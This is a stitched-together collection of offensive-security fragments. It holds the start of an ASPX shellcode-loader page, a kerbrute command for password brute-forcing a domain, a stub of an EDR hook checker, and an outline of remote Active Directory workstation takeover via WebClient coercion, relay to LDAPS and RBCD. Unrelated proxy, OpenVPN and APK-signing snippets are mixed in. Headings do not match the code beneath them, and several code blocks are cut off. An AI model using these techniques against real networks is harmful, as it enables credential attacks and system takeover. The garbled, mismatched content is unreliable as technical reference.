```cs
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Security.Cryptography" %>
<script runat="server">
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
```
With kerbrute.py:

```bash
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With the Rubeus version that has the brute module:
```html
<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="upload.php" method="POST">
<p>Upload your file</p>
<!-- input is a void element and takes no closing tag -->
<input type="file" name="uploaded_file"><br />
<input type="submit" value="Upload">
</form>
</body>
</html>
```
```cs
using System;
using System.Runtime.InteropServices;
/* References
 * 1. https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions
 * 2. https://github.com/Mr-Un1k0d3r/EDRs
 */
namespace SharpHookCheck
{
```
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
Tested on Windows 10 x64, Anniversary Update
17.09.2017
- Set up an OpenVPN connection following this guide
- Generate a TA key and place it in the same folder as the other certificates/keys:
```bash
# set http proxy
export http_proxy=http://127.0.0.1:8080
# set http proxy with user and password
export http_proxy=http://USERNAME:PASSWORD@127.0.0.1:8080
# set http proxy with user and password (with special characters)
export http_proxy=http://`urlencode 'USERNAME'`:`urlencode 'PASSWORD'`@127.0.0.1:8080
```

```bash
# You must first install apktool (https://github.com/iBotPeaches/Apktool) and the Android SDK
# and decompile the apk using it:
# apktool d -rf my-app.apk
# then generate a key for signing:
# keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
rm signed-app.apk
apktool b -f -d com.myapp
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore com.myapp/dist/com.myapp.apk alias_name
zipalign -v 4 com.myapp/dist/com.myapp.apk signed-app.apk
```